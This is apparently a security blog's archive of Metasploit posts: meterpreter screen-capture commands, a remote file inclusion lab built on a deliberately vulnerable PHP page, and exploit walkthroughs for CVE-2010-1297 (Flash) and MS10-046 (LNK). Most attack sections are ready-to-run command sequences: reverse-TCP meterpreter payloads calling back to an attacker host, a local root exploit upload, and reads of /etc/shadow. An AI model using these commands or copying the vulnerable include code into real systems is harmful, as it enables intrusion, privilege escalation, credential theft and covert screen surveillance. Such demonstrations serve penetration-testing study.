Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

Metasploit Meterpreter screenshot screenspy screengrab

Metasploit,

Metasploit provide some commands to extend the usage of meterpreter. We will describe here under the usage of screenshot, screenspy and screengrab.

First of all you require a valid meterpreter session on a Windows box to use these extensions.

  • screenshot

This stdapi command allow you to create a screen shot from the current Windows interactive desktop.

screenshot command could be used with these arguments :

-h : to display the help banner.
-p : The JPEG image file path. By default $HOME/[randomname].jpeg
-q : The JPEG image quality. By default ’50’.
-v : Automatically view the JPEG image, by default ‘true’.

Metasploit Meterpreter screenshot
Metasploit Meterpreter screenshot
  • (bg)run screenspy

Same as the screenshot command, but taking at regular interval screen shot from the current Windows interactive desktop. Require Firefox to visualize the screen shots. A HTML page, containing the new screen shot, will be updated regularly, into Firefox, every x seconds.

screenspy command could be used with these arguments :

-h : to display the help banner.
-d : The delay in seconds between each screen shot. By default 3 seconds.
-t : The time, in second, for the screenspy execution. By default 10 seconds.
-s : The targeted system, linux or windows. By default linux.

Metasploit Meterpreter screenspy
Metasploit Meterpreter screenspy
  • screengrab

This espia command attempt to grab a screen shot from the current Windows interactive desktop.

screengrab command coulb be used with these arguments :

-h : to display the help banner.

Metasploit Meterpreter screengrab
Metasploit Meterpreter screengrab
Metasploit Meterpreter screengrab usage
Metasploit Meterpreter screengrab usage

Remote File Inclusion and privilege escalation through Metasploit

Metasploit, ,

Demonstration of a RFI (Remote File Inclusion) attack followed by a privilege escalation through Metasploit. The privilege escalation will be done through the CVE-2010-3904 Linux RDS Protocol vulnerability.

Vulnerable web page creation

mkdir 1
vi 1/index.php
<?php
$color='blue';
if(isset($_REQUEST['COLOR'])) {
$color = $_REQUEST['COLOR'];
}
require ($color . '.php');
?>

chown -R apache:apache 1

Vulnerable web page exploitation through Metasploit

use exploit/unix/webapp/php_include
show options
set PATH /1/
set PHPURI /index.php?COLOR=XXpathXX
set RHOST 192.168.178.47
ifconfig
set SRVHOST 192.168.178.21
show options

set PAYLOAD php/meterpreter_reverse_tcp
show options
set LHOST 192.168.178.21
exploit

getuid
getpid
ps
sysinfo
pwd
ls
cat index.php
cat /etc/shadow

lwpd
lcd /home/eromang/exploits/linux/local_escal­ations
upload linux-rds-exploit_CVE-2010-3904

execute -i -f bash
id
chmod u+x linux-rds-exploit_CVE-2010-3904
./linux-rds-exploit_CVE-2010-3904
id
cat /etc/shadow

Video demonstration

CVE-2010-1297 : Adobe Flash Player newfunction Invalid Pointer Use

Exploits, Metasploit,

Timeline :

Vulnerability & PoC disclosed by unknown on Exploit-DB the 2010-06-09
Metasploit PoC provided the 2010-06-10

PoC provided by :

unknown
jduck

Reference(s) :

CVE-2010-1297
APSA10-01

Affected version(s) :

Adobe Flash Player 10.0.45.2, 9.0.262, and previous versions for 10.0.x and 9.0.x for Windows, Macintosh, Linux and Solaris.
Adobe Reader and Acrobat 9.3.2, and previous versions 9.x for Windows, Macintosh and UNIX.

Tested on Windows XP SP3

Description :

This module exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due a the hardcoded syscall number.

Commands :

use exploit/windows/browser/adobe_flashplayer_newfun­ction
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-046 : Microsoft Windows Shell LNK Execution

Exploits, Metasploit, ,

Timeline :

Vulnerability discovered exploited in the wild, part of the Stuxnet worm
Metasploit PoC provided the 2010-07-19

PoC provided by :

hdmoore
jduck
B_H

Reference(s) :

CVE-2010-2568
MS10-046

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP1 et Windows Vista SP2
Windows Vista x64 Edition SP1 et Windows Vista x64 Edition SP2
Windows Server 2008 32 et Windows Server 2008 32 SP2
Windows Server 2008 x64 et Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64

Tested on Windows XP SP3

Description :

This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.

Commands :

use windows/browser/ms10_046_shortcut_icon_dllloader
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig